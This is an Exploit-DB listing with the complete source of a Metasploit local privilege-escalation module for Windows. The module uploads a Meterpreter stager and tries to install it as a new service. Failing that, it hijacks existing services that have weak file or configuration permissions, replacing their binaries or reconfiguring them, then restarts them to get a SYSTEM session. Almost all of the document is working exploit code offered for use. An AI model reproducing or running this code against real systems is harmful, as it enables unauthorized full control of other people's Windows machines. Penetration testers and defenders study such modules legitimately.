Microsoft Windows - Escalate Service Permissions Privilege Escalation (Metasploit)

EDB-ID:

21994

CVE:

N/A

Author:

Metasploit

Type:

local

Platform:

Windows

Published:

2012-10-16

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'msf/core/post/windows/services'
require 'rex'

class Metasploit3 < Msf::Exploit::Local
	Rank = GreatRanking

	include Msf::Post::Windows::WindowsServices

	def initialize(info={})
		super( update_info( info,
			'Name'          => 'Windows Escalate Service Permissions Local Privilege Escalation',
			'Description'   => %q{
				This module attempts to exploit existing administrative privileges to obtain
				a SYSTEM session. If directly creating a service fails, this module will inspect
				existing services to look for insecure file or configuration permissions that may
				be hijacked. It will then attempt to restart the replaced service to run the
				payload. This will result in a new session when this succeeds. If the module is
				able to modify the service but does not have permission to start and stop the
				affected service, the attacker must wait for the system to restart before a
				session will be created.
			},
			'License'       => MSF_LICENSE,
			'Author'        => [ 'scriptjunkie' ],
			'Arch'          => [ ARCH_X86 ],
			'Platform'      => [ 'windows' ],
			'SessionTypes'  => [ 'meterpreter' ],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
					'WfsDelay' => '5'
				},
			'Targets'       =>
				[
					[ 'Automatic', { } ],
				],
			'DefaultTarget' => 0
		))

		register_options([
			OptBool.new("AGGRESSIVE", [ false, "Exploit as many services as possible (dangerous)", false ])
		])

	end

	def exploit
		# randomize the filename
		filename= Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"

		# randomize the exe name
		tempexe_name = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"

		raw = payload.encoded

		exe = Msf::Util::EXE.to_win32pe_service(session.framework, raw)

		sysdir = session.fs.file.expand_path("%SystemRoot%")
		tmpdir = session.fs.file.expand_path("%TEMP%")

		print_status("Meterpreter stager executable #{exe.length} bytes long being uploaded..")
		begin
			#
			# Upload the payload to the filesystem
			#
			tempexe = tmpdir + "\\" + tempexe_name
			fd = session.fs.file.new(tempexe, "wb")
			fd.write(exe)
			fd.close
		rescue ::Exception => e
			print_error("Error uploading file #{filename}: #{e.class} #{e}")
			return
		end

		#attempt to make new service

		#SERVICE_NO_CHANGE 0xffffffff for DWORDS or NULL for pointer values leaves the current config

		print_status("Trying to add a new service...")
		adv = session.railgun.advapi32
		manag = adv.OpenSCManagerA(nil,nil,0x10013)
		if(manag["return"] != 0)
			# SC_MANAGER_CREATE_SERVICE = 0x0002
			# SERVICE_START=0x0010  SERVICE_WIN32_OWN_PROCESS= 0X00000010
			# SERVICE_AUTO_START = 2 SERVICE_ERROR_IGNORE = 0
			newservice = adv.CreateServiceA(manag["return"],Rex::Text.rand_text_alpha((rand(8)+6)),
				"",0x0010,0X00000010,2,0,tempexe,nil,nil,nil,nil,nil)
			if(newservice["return"] != 0)
				print_status("Created service... #{newservice["return"]}")
				ret = adv.StartServiceA(newservice["return"], 0, nil)
				print_status("Service should be started! Enjoy your new SYSTEM meterpreter session.")
				adv.DeleteService(newservice["return"])
				adv.CloseServiceHandle(newservice["return"])
				if datastore['AGGRESSIVE'] != true
					adv.CloseServiceHandle(manag["return"])
					return
				end
			else
				print_error("Uhoh. service creation failed, but we should have the permissions. :-(")
			end
		else
			print_status("No privs to create a service...")
			manag = adv.OpenSCManagerA(nil,nil,1)
			if(manag["return"] == 0)
				print_status("Cannot open sc manager. You must have no privs at all. Ridiculous.")
			end
		end
		print_status("Trying to find weak permissions in existing services..")
		#Search through list of services to find weak permissions, whether file or config
		serviceskey = "HKLM\\SYSTEM\\CurrentControlSet\\Services"
		#for each service
		service_list.each do |serv|
			begin
				srvtype = registry_getvaldata("#{serviceskey}\\#{serv}","Type").to_s
				if srvtype != "16"
					continue
				end
				moved = false
				configed = false
				#default path, but there should be an ImagePath registry key
				source = session.fs.file.expand_path("%SYSTEMROOT%\\system32\\#{serv}.exe")
				#get path to exe; parse out quotes and arguments
				sourceorig = registry_getvaldata("#{serviceskey}\\#{serv}","ImagePath").to_s
				sourcemaybe = session.fs.file.expand_path(sourceorig)
				if( sourcemaybe[0] == '"' )
					sourcemaybe = sourcemaybe.split('"')[1]
				else
					sourcemaybe = sourcemaybe.split(' ')[0]
				end
				begin
					session.fs.file.stat(sourcemaybe) #check if it really exists
					source = sourcemaybe
				rescue
					print_status("Cannot reliably determine path for #{serv} executable. Trying #{source}")
				end
				#try to exploit weak file permissions
				if(source != tempexe && session.railgun.kernel32.MoveFileA(source, source+'.bak')["return"])
					session.railgun.kernel32.CopyFileA(tempexe, source, false)
					print_status("#{serv} has weak file permissions - #{source} moved to #{source+'.bak'} and replaced.")
					moved = true
				end
				#try to exploit weak config permissions
				#open with SERVICE_CHANGE_CONFIG (0x0002)
				servhandleret = adv.OpenServiceA(manag["return"],serv,2)
				if(servhandleret["return"] != 0)
					#SERVICE_NO_CHANGE is  0xFFFFFFFF
					if(adv.ChangeServiceConfigA(servhandleret["return"],0xFFFFFFFF,
							0xFFFFFFFF,0xFFFFFFFF,tempexe,nil,nil,nil,nil,nil,nil))
						print_status("#{serv} has weak configuration permissions - reconfigured to use exe #{tempexe}.")
						configed = true
					end
					adv.CloseServiceHandle(servhandleret["return"])

				end
				if(moved != true && configed != true)
					print_status("No exploitable weak permissions found on #{serv}")
					continue
				end
				print_status("Restarting #{serv}")
				#open with  SERVICE_START (0x0010) and SERVICE_STOP (0x0020)
				servhandleret = adv.OpenServiceA(manag["return"],serv,0x30)
				if(servhandleret["return"] != 0)
					#SERVICE_CONTROL_STOP = 0x00000001
					if(adv.ControlService(servhandleret["return"],1,56))
						session.railgun.kernel32.Sleep(1000)
						adv.StartServiceA(servhandleret["return"],0,nil)
						print_status("#{serv} restarted. You should get a system meterpreter soon. Enjoy.")
						#Cleanup
						if moved == true
							session.railgun.kernel32.MoveFileExA(source+'.bak', source, 1)
						end
						if configed == true
							servhandleret = adv.OpenServiceA(manag["return"],serv,2)
							adv.ChangeServiceConfigA(servhandleret["return"],0xFFFFFFFF,
									0xFFFFFFFF,0xFFFFFFFF,sourceorig,nil,nil,nil,nil,nil,nil)
							adv.CloseServiceHandle(servhandleret["return"])
						end
					else
						print_status("Could not restart #{serv}. Wait for a reboot or force one yourself.")
					end
					adv.CloseServiceHandle(servhandleret["return"])
					if datastore['AGGRESSIVE'] != true
						return
					end
				else
					print_status("Could not restart #{serv}. Wait for a reboot. (or force one yourself)")
				end
			rescue
			end
		end
	end
end